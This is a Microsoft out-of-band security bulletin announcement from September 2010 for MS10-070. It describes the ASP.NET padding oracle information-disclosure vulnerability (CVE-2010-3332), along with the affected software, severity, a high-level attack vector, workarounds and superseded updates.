Out Of Band Security Update for ASP.NET

Today, as part of Microsoft’s ongoing commitment to protect its customers with security updates and the latest guidance on the threat landscape, the company is releasing MS10-070 as an out-of-band security update. The update addresses a vulnerability in ASP.NET, as described in Security Advisory 2416728, and carries a maximum severity rating of Important and an Exploitability Index rating of 1. As outlined in the advisory, the vulnerability affects ASP.NET framework on Windows XP, Windows Vista, Windows 7, and Windows Server 2003 and 2008 and Windows Server 2008 R2.

Microsoft recommends that its customers deploy the update as soon as possible to help protect their computers from criminal attacks. Please see the Microsoft Security Response Center (MSRC) blog for more details.

As always, please let us know if you have any questions!

What is the purpose of this alert?

This alert is to provide you with an overview of the new security bulletin being released (out-of-band) on September 28, 2010.

New Security Bulletin Overview

Microsoft is releasing one new security bulletin (out-of-band) for newly discovered vulnerabilities:

Note: Affected software listed above is an abstract. Please see the “Affected Software” section of the bulletin at the link in the left column above for complete details.

Executive Summary

This security update resolves a publicly disclosed vulnerability in ASP.NET. The vulnerability could allow information disclosure. An attacker who successfully exploited this vulnerability could read data, such as the view state, which was encrypted by the server. This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server. Microsoft .NET Framework versions prior to Microsoft .NET Framework 3.5 Service Pack 1 are not affected by the file content disclosure portion of this vulnerability.

This security update is rated Important for all supported editions of ASP.NET except Microsoft .NET Framework 1.0 Service Pack 3. The security update addresses the vulnerability by additionally signing all data that is encrypted by ASP.NET.

In the following tables of affected and non-affected software, software editions that are not listed are past their support lifecycle. To determine the support lifecycle for your product and edition, visit the Microsoft Support Lifecycle web site at http://support.microsoft.com/lifecycle/.

Bulletin Identifier

Microsoft Security Bulletin MS10-070

Bulletin Title

Vulnerability in ASP.NET Could Allow Information Disclosure (2418042)

Executive Summary

This security update resolves a publicly disclosed vulnerability in ASP.NET. The vulnerability could allow information disclosure. An attacker who successfully exploited this vulnerability could read data, such as the view state, which was encrypted by the server. This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server.

Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system. In Microsoft .NET Framework 3.5 Service Pack 1 and above, this vulnerability can also be used by an attacker to retrieve the contents of any file within the ASP.NET application, including web.config.

The security update addresses the vulnerability by additionally signing all data that is encrypted by ASP.NET.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of ASP.NET except Microsoft .NET Framework 1.0 Service Pack 3.

CVE

CVE-2010-3332 - ASP.NET Padding Oracle Vulnerability

Attack Vectors

To exploit this vulnerability, an attacker would send cipher text via a Web request to an affected server to determine whether the text was decrypted properly by examining the error code returned by the website. An attacker who made enough of these requests could learn enough information to read or tamper with the encrypted data.

Mitigating Factors

Microsoft .NET Framework versions prior to Microsoft .NET Framework 3.5 Service Pack 1 are not affected by the file content disclosure portion of this vulnerability.

Workarounds

Enable a UrlScan or Request Filtering rule, enable ASP.NET custom errors, and map all error codes to the same error page. For specific steps, see the “Workaround” section of the bulletin at the link below.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-041 and MS09-036 on specific versions of Microsoft .NET Framework on specific operating systems. For specific details, see the “Affected Software” section of the bulletin at the link below.